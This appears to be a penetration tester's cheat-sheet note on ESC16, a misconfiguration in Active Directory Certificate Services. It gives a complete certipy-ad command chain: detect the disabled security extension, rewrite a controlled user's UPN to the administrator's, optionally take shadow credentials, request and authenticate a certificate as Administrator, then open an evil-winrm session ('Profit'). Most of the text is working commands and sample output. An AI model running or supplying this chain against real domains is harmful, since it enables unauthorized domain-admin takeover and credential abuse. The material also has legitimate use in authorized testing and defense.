ESC16

Prerequisites

OID 1.3.6.1.4.1.311.25.2 must be set in Disabled Extentsions

1.0.0 certipy-ad

1.1.0 find vulnerability

certipy-ad find -k -no-pass \ 
			-vulnerable -stdout \
			-dc-ip $ip \
			-target $dns'.'$domain
 
[!] Vulnerabilities
ESC16 : Security Extension is disabled.

1.2.0 UPN manipulation

1.2.1 Read current users UPN

certipy-ad account -k -no-pass -dc-ip $ip -user 'user_to_change' read
 
[*] Reading attributes for 'user_to_change':
userPrincipalName : user_to_change@domain.local

1.2.2 Manipulate current users UPN

 certipy-ad account -target $dns'.'$domain \
					 -k -no-pass -dc-ip $ip \
					 -user 'user_to_change' \
					 -upn $targetUPN update
 
[*] Updating user 'user_to_change':
    userPrincipalName                   : administrator@domain.local
[*] Successfully updated 'user_to_change'

1.3.0 Obtain credentials from user (if needed)

certipy shadow \
    -u $user'@'$domain -p $pass \
    -dc-ip $ip -account 'user_to_change' \
    auto

1.4.0 Request and authenticate certificate

1.4.1 Request

certipy-ad req -k -dc-ip $ip -target $dns'.'$domain \
				-ca 'domain-DC01-CA' -template 'user'

1.4.2 Authenticate

certipy-ad auth -pfx administrator.pfx \
			-username 'Administrator' \
			-domain $domain \
			-dc-ip $ip

1.5.0 Revert UPN manipulation

certipy-ad account -target $dns'.'$domain \
					-k -no-pass -dc-ip $ip \
					-user 'user_to_change' -upn 'user_to_change' update

1.6.0 Profit

export KRB5CCNAME=administrator.ccache
evil-winrm -i $dns'.'$domain -r $domain

References

ly4k/Certipy

hckhsn

Explorer

ESC16

ESC16

1.0.0 certipy-ad

1.1.0 find vulnerability

1.2.0 UPN manipulation

1.2.1 Read current users UPN

1.2.2 Manipulate current users UPN

1.3.0 Obtain credentials from user (if needed)

1.4.0 Request and authenticate certificate

1.4.1 Request

1.4.2 Authenticate

1.5.0 Revert UPN manipulation

1.6.0 Profit

References

Graphansicht

Inhaltsverzeichnis